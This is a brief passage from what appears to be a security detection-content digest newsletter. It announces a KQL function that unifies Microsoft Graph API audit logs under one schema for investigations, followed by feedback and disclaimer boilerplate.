A new KQL function, UnifiedMicrosoftGraphLogs, was added to normalize log data from the GraphAPIAuditEvents table to match the schema of MicrosoftGraphActivityLogs. This allows analysts to query a unified dataset for Microsoft Graph API activity, simplifying investigations. (UnifiedMicrosoftGraphLogs)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by an LLM based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.